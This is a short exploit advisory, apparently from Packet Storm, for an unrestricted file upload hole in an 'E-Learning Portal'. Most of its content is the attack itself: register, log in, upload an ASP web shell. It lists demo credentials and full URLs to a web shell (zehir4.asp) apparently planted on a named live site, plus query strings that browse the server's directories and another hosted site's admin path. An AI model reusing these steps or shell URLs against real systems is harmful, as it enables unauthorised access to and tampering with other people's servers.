E-Learning Portal suffers from a remote file upload vulnerability.
609154c940f4bb4bf338ad2f70a946a0fa0d92fde680b41ac37696ea261a9ddd[~] E-Learning Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] D-Unit: ZoRLu & SuB-ZeRo
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
exp:
http://www.preprojects.com/elearning/uploaded/your_shell.asp
you register to site
login this site
after upload you_shell.asp
exp for demo:
register:
http://www.preprojects.com/elearning/new_student.asp
login:
role: select STUDENT
user: zorlu
passwd: zorlu1
shell
http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )
server daki siteler:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git
buda golden gate:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Cyber-Zone
[~]
[~] yildirimordulari.org & packetstormsecurity.org & exploiter5.com
[~]
[~]----------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed